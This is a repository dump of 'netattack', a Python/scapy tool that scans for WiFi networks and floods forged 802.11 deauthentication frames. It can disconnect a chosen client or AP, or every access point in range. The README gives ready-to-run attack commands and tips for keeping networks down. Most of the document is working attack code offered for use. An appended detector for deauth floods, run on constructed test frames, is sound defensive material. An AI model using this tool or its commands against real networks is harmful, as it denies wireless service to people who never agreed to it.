├── LICENSE
├── README.md
└── netattack.py

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2017

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# NETATTACK
netattack.py is a Python script that allows you to scan your local area for WiFi networks and perform deauthentication attacks. The effectiveness and power of this script depend heavily on your wireless card.

## NETATTACK 2 RELEASED
https://github.com/chrizator/netattack2/
## USAGE

### EASY
#### SCANNING FOR WIFI NETWORKS
```
python netattack.py -scan -mon
```
This example will perform a WiFi network scan. The BSSID, ESSID and the channel will be listed in a table.
```
-scan | --scan
```
This parameter must be passed when you want to do a scan. It's one of the main commands. It searches for beacon frames, which routers send to announce their presence.
```
-mon | --monitor
```
With this parameter the script automatically detects your wireless card and puts it into monitoring mode to capture the ongoing traffic.
If you know the name of your wireless card and it's already working in monitoring mode, you can use
```
-i
```
This can be used instead of ```-mon```.
#### DEAUTHENTICATION ATTACK
```
python netattack.py -deauth -b AB:CD:EF:GH:IJ:KL -u 12:34:56:78:91:23 -c 4 -mon
```
This command will obviously perform a deauthentication attack.
```
-deauth | --deauth
```
Like ```-scan```, this is one of the main parameters. It is required if you want to deauth-attack a certain target.
```
-b | --bssid
```
With ```-b``` you select the AP's MAC address (BSSID). The ```-deauth``` parameter requires one or multiple BSSIDs.
```
-u | --client
```
If you don't want to attack the whole network, but a single user/client/device, you can do this with ```-u```. It is optional.
```
-c | --channel
```
With this parameter, the deauthentication attack is performed on the given channel. Using ```-c``` is highly recommended since the attack will fail if the wrong channel is used. The channel of the AP can be seen by doing a WiFi scan (```-scan```). If you don't add ```-c``` the attack will take place on the current channel.

The ```-mon``` or ```-i``` parameter is necessary for this attack as well.

#### DEAUTHENTICATION ATTACK ON EVERYBODY
```
python netattack.py -deauthall -i [IFACE]
```
When this command is called, the script automatically searches for APs in your area. After the search it starts deauth-attacking all of the APs it found. The ```-deauthall``` parameter only needs an interface to work.
ATTENTION: If you want all of these attacks to be as efficient as possible, have a look at the following "ADVANCED" section.

### ADVANCED
```
-p | --packetburst
```
This parameter sets the packet burst. Especially when you are targeting multiple APs or even performing a ```-deauthall``` attack, the parameter is a must-have. It defines the number of deauth packets to send after switching the target. If the parameter is not given, it defaults to 64. But that is highly inefficient if you are attacking 4+ APs.
```
-t | --timeout
```
This parameter can be added to ```-scan``` or ```-deauth```. If it's added to the ```-scan``` parameter, it defines the delay while switching the channel. It is set to 0.75s by default, so it waits 0.75s on each channel to collect beacon frames.
If it's added to the ```-deauth``` parameter, it defines the delay between each packet burst. This can be used to decrease the intensity of the attack or to attack the target(s) at a certain time.
```
-cf | --channelformat
```
This parameter can only be added to ```-scan```. It shows a more detailed output while scanning. It's mainly recommended when the location changes and with it the APs.
```
-a | --amount
```
This parameter can only be added to ```-deauth```. It defines a certain number of packet bursts to send. This can be used for taking down the WiFi for a certain time.

## REQUIREMENTS
- Python 2.5+ (not Python 3+)
- Modules:
    - scapy
    - argparse
    - sys
    - OS
    - threading
    - logging
- iw(config)
- OFC LINUX

## DISCLAIMER AND LICENSE
THE OWNER AND PRODUCER OF THIS SOFTWARE IS NOT LIABLE FOR ANY DAMAGE OR ANY LAW VIOLATIONS CAUSED BY THE SOFTWARE.

--------------------------------------------------------------------------------
/netattack.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

import sys
import os
import time
import argparse
from threading import Thread
import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0

W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
P = '\033[35m' # purple
BOLD = '\033[1m' # bold
THIN = '\033[1m' # normal

# creating arguments
def argument_parser():
    parser = argparse.ArgumentParser(usage='''

'''+BOLD+'''SCAN NETWORKS:'''+THIN+O+'''
    -scan (Main command)'''+W+'''
        -i or -mon (Interfaces)
        -cf (More detailed output format)
        -t (Set channel switch delay)
        -nr (Don't do a rescan)

'''+BOLD+'''DEAUTH CERTAIN NETWORKS:'''+THIN+O+'''
    -deauth (Main command)'''+W+'''
        -b (Add a BSSID)
        -u (Add a client)
        -i or -mon (Interfaces)
        -p (Change Packetburst)
        -t (set time Interval)

'''+BOLD+'''DEAUTH ALL NETWORKS:'''+THIN+O+'''
    -deauthall (Main command)'''+W+'''
        -i or -mon (Interfaces)
        -p (Packetburst)''')

    parser.add_argument('-mon',
                        '--monitor',
                        action='store_true',
                        help='This activates the monitoring mode \
                        and automatically searches for your wlan device.')
    parser.add_argument('-scan',
                        '--scan',
                        action='store_true',
                        help='This is one of the main parameters. \
                        It searches for all available WiFi-Networks. \
                        Other parameters can be added optionally.')
    parser.add_argument('-cf',
                        '--channelformat',
                        action='store_true',
                        help='It activates the channelformat. \
                        It\'s kind of verbose layout of searching. \
                        Espacially useful if searching for 1 network.')
    parser.add_argument('-t',
                        '--timeout',
                        type=float,
                        help='This is setting a delay. \
                        It can be used to add a delay to deauth \
                        or a delay for switching the channel while scanning. \
                        DEFAULT = 0.75')
    parser.add_argument('-nr',
                        '--norescan',
                        action='store_true',
                        help='-nr can only be used with -scan. \
                        This deactivates multiple scans \
                        and stops when channel 14 is reached.')
    parser.add_argument('-deauth',
                        '--deauth',
                        action='store_true',
                        help='This is one of the main parameters. \
                        It deauth-attacks a certain BSSID. \
                        Adding a client is optionally.')
    parser.add_argument('-deauthall',
                        '--deauthall',
                        action='store_true',
                        help='This is one of the main parameters. \
                        It searches all the WiFi Networks near by \
                        and deauth-attacks them.')
    parser.add_argument('-b',
                        '--bssid',
                        nargs='*',
                        help='With this you add a BSSID to a deauth. \
                        It\'s a necessary parameter for -deauth.')
    parser.add_argument('-a',
                        '--amount',
                        default=0,
                        type=int,
                        help='This is the amount of deauth-packages to be send. \
                        It can only be used with -deauth \
                        DEFAULT = infinite')
    parser.add_argument('-u',
                        '--client',
                        default='FF:FF:FF:FF:FF:FF',
                        help='This adds a client to a deauth-attack. \
                        It can only be used with -deauth and is optionally.\
                        DEFAULT = FF:FF:FF:FF:FF:FF (Broadcast)')
    parser.add_argument('-c',
                        '--channel',
                        type=int,
                        help='This adds a channel to a deauth-attack. \
                        It can only be used with -d. \
                        If there is no certain channel the current channel will be used.')
    parser.add_argument('-p',
                        '--packetburst',
                        type=int,
                        default=64,
                        help='This sets the amount of packets in one burst. \
                        It can only be used with -d \
                        DEFAULT = 64')
    parser.add_argument('-i',
                        '--interface',
                        help='This is a necessary parameter. \
                        It calls the monitoring interface. \
                        This parameter needs to be included everywhere.')

    return parser

def throw_error():
    # invalid arguments handling
    if not args.deauth and not args.scan and not args.deauthall and not args.monitor:
        argument_parser().print_usage()
        sys.exit(0)
    if not args.interface and not args.monitor:
        print('[' +R+ '-' +W+'] No interface selected.')
        sys.exit(0)
    if args.deauth and args.channelformat:
        print('[' +R+ '-' +W+'] Parameter -cf not available when deauthing.')
        sys.exit(0)
    if args.deauth and not args.bssid:
        print('[' +R+ '-' +W+'] Error. No BSSID selected.')
        sys.exit(0)
    if args.scan and args.packetburst != 64:
        print('[' +R+ '-' +W+'] Parameter -p not available when scanning.')
    if args.scan and args.amount:
        print('[' +R+ '-' +W+'] Parameter -a not available when scanning.')
        sys.exit(0)
    if args.scan and args.bssid:
        print('[' +R+ '-' +W+'] Parameter -b not available when scanning.')
        sys.exit(0)
    if args.scan and args.deauth:
        print('[' +R+ '-' +W+'] Scan and Deauth can\'t be executed at the same time.')
        sys.exit(0)
    if args.deauth and args.norescan:
        print('[' +R+ '-' +W+'] Parameter -nr not available when deauthing.')
    if args.deauthall:
        if args.bssid or args.channel or args.amount or args.deauth or args.norescan or args.timeout or args.channelformat or args.scan:
            print('[' +R+ '-' +W+'] (1) -deauthall -i ["iface"] -p ["packets"]| no more parameters. (2) Remove -deauthall')
    if args.bssid and args.client != 'FF:FF:FF:FF:FF:FF':
        if len(args.bssid) > 1:
            print('[' +R+ '-' +W+'] Unable to add clients if there are multiple BSSIDs.')
            sys.exit(0)
    if args.interface and args.monitor:
        print('[' +R+ '-' +W+'] You can\'t use -i and -mon. Try only one of them.')
        sys.exit(0)


# # # # # # # # # # # # # # #
#           SCAN            #
# # # # # # # # # # # # # # #

# handling the packages
def pckt_handler(pckt):
    if pckt.haslayer(Dot11): #-> check if pckt type 802.11
        if pckt.type == 0 and pckt.subtype == 8: # check if Beacon frame
            if pckt.addr2 not in APs:
                APs[pckt.addr2] = on_channel #-> add to APs dict
                output_aps(pckt.addr2, pckt.info, on_channel) #-> print it out

# printing found ap
def output_aps(bssid, essid, channel):
    ch_space = 2 # leave different space for channel numbers
    if len(str(channel)) == 1:
        ch_space = 3

    if args.channelformat:
        print('[' +G+ '+' +W+ '] [' +P+ 'BSSID' +W+ '] '+str(bssid).upper()+' '*2+'|'+' '*2+'[' +P+ 'CH' +W+ '] '+str(channel)+' '*ch_space+'|'+' '*2+'[' +P+ 'ESSID' +W+ '] '+essid+'')

    else:
        print(str(bssid).upper() + ' | ' + str(channel) + ' '*ch_space + '| ' + str(essid))


# hopping between wifi channels
def channel_hop():
    global on_channel

    timeout = 0.75

    if args.timeout:
        timeout = args.timeout

    if not args.channelformat:
        print('\n[' +O+ '*' +W+ '] Searching for WiFi Networks...\n')
        print(O+ 'MAC' + ' '*19 + 'CH' + ' '*5 + 'ESSID' +W)

    while True:
        if on_channel > 14:
            if args.norescan:
                print('\nPress CTRL-C to quit...')
                sys.exit(0)
            elif not rescan:
                break
            else:
                on_channel = 1
                if args.channelformat:
                    print('\n--------------- RESCAN ---------------\n')
                continue

        if args.channelformat:
            print('[CHANNEL] ' + str(on_channel) + '/14')

        os.system('iwconfig ' + iface + ' channel ' + str(on_channel))

        time.sleep(timeout)
        on_channel += 1


# # # # # # # # # # # # # # #
#          DEAUTH           #
# # # # # # # # # # # # # # #

def set_channel():
    channel = 4
    if args.channel:
        channel = args.channel
    os.system('iwconfig ' + iface + ' channel ' + str(channel))

# creating and managing packets
def deauth(args):
    bssid = args.bssid
    client = args.client
    amount = args.amount
    sleep = 0
    endless = False
    if amount == 0:
        endless = True
    if args.timeout:
        sleep = args.timeout

    while endless:
        for ap in bssid:
            ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
            if client != 'FF:FF:FF:FF:FF:FF':
                c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth()
            try:
                for x in range(args.packetburst):
                    send(ap_c_pckt)
                    if client != 'FF:FF:FF:FF:FF:FF':
                        send(c_ap_pckt)
                print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap)
                time.sleep(sleep)
            except(KeyboardInterrupt):
                print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
                sys.exit(0)

    while amount > 0 and not endless:
        for ap in bssid:
            ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
            if client != 'FF:FF:FF:FF:FF:FF':
                c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth()
            try:
                for x in range(args.packetburst):
                    send(ap_c_pckt)
                    if client != 'FF:FF:FF:FF:FF:FF':
                        send(c_ap_pckt)
                print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap)

                amount -= 1
                time.sleep(sleep)

            except (KeyboardInterrupt):
                print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
                sys.exit(0)

    print('[' +R+ '!' +W+ '] Finished successfully.')


def deauth_all():
    print('\n[' +O+ '*' +W+ '] Starting deauth...\n')
    while True:
        for ap in APs:
            for x in range(args.packetburst):
                try:
                    ap_c_pckt = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap) / Dot11Deauth()
                    os.system('iwconfig ' + iface + ' channel ' + str(APs[ap]))
                    send(ap_c_pckt)
                except (KeyboardInterrupt):
                    print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
                    sys.exit(0)
            print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + str(ap).upper())


# # # # # # # # # # # # # # #
#          MONITOR          #
# # # # # # # # # # # # # # #

def monitor_on():
    ifaces = os.listdir('/sys/class/net/')
    status = False
    for iface in ifaces:
        if 'wlan' in iface:
            print('\n[' +G+ '+' +W+ '] Interface found!\nTurning on monitoring mode...')
            os.system('ifconfig ' + iface + ' down')
            os.system('iwconfig ' + iface + ' mode monitor')
            os.system('ifconfig ' + iface + ' up')
            print('[' +G+ '+' +W+ '] Turned on monitoring mode on: ' + iface)
            status = True
            return iface
    if status == False:
        print('[' +R+ '-' +W+'] No interface found. Try it manually.')
        sys.exit(0)


# # # # # # # # # # # # # # #
#           MAIN            #
# # # # # # # # # # # # # # #

if __name__ == '__main__':
    print(P+'* * * * * * * * * * * * * * * * * *')
    print('* N E T A T T A C K by chrizator *')
    print('* * * * * * * * * * * * * * * * * *'+W)

    args = argument_parser().parse_args()
    APs = {}
    on_channel = 1
    rescan = True

    throw_error()

    iface = None
    if args.interface:
        iface = args.interface
    if args.monitor:
        iface = monitor_on()

    conf.iface = iface #-> set scapy's interface

    ## SCAN ##
    if args.scan:
        # channel hopping thread
        hop_t = Thread(target=channel_hop, args=[])
        hop_t.daemon = True
        hop_t.start()


        sniff(iface=iface, prn=pckt_handler, store=0)


    ## DEAUTH ##
    if args.deauth:
        set_channel()
        deauth(args)


    ## DEAUTHALL#
    if args.deauthall:
        rescan = False

        hop_t = Thread(target=channel_hop, args=[])
        hop_t.daemon = True
        hop_t.start()

        sniff(iface=iface, prn=pckt_handler, store=0, timeout=13)
        deauth_all()

--------------------------------------------------------------------------------
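
The frames built in deauth() and deauth_all() are unauthenticated 802.11 deauthentication frames whose BSSID field (addr3) is the targeted AP, sent in bursts (64 per burst by default), so they show up on a monitoring sensor as a run of deauth frames for one BSSID inside a short window. The following detector is an added example for defenders and is not part of the netattack repository; the threshold of 32 frames per second, the function names and the sample capture are assumptions made for the example, and frames are expected as bare 802.11 headers without radiotap.

```python
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(raw):
    return ":".join("%02x" % b for b in raw)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for a bare 802.11 deauth frame, else None."""
    if len(frame) < 26:                      # 24-byte header + 2-byte reason code
        return None
    fc = frame[0]
    if fc & 0x03 != 0 or (fc >> 2) & 0x03 != 0 or fc >> 4 != 12:
        return None                          # not version 0 / management / deauth
    reason = struct.unpack_from("<H", frame, 24)[0]
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_floods(capture, threshold=32, window=1.0):
    """Alert once per BSSID when `threshold` deauths arrive within `window` seconds.

    capture: iterable of (timestamp, raw_frame) in time order.
    """
    recent = defaultdict(deque)              # bssid -> deque of (ts, dst)
    alerts = {}
    for ts, raw in capture:
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        dst, _src, bssid, _reason = parsed
        seen = recent[bssid]
        seen.append((ts, dst))
        while ts - seen[0][0] > window:      # drop frames older than the window
            seen.popleft()
        if len(seen) >= threshold and bssid not in alerts:
            alerts[bssid] = {"bssid": bssid, "first_seen": seen[0][0], "count": len(seen),
                             "broadcast": all(d == BROADCAST for _, d in seen)}
    return list(alerts.values())

def build_frame(subtype, dst, src, bssid, body=b"\x07\x00"):
    """Constructed test input: management frame header plus a 2-byte body."""
    addrs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (dst, src, bssid))
    return bytes([subtype << 4, 0]) + b"\x00\x00" + addrs + b"\x00\x00" + body

# Constructed capture: one beacon, one isolated deauth, then a 64-frame broadcast burst.
AP1, AP2, STA = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:aa"
SAMPLE = [(0.0, build_frame(8, BROADCAST, AP1, AP1)),
          (0.5, build_frame(12, STA, AP2, AP2))]
SAMPLE += [(1.0 + i * 0.001, build_frame(12, BROADCAST, AP1, AP1)) for i in range(64)]

if __name__ == "__main__":
    for alert in detect_floods(SAMPLE):
        print(alert)
```

Keying the window on addr3 catches both directions the script forges (AP to client and client to AP), since both carry the AP's BSSID there. Detection complements, rather than replaces, enabling 802.11w Protected Management Frames where clients support it.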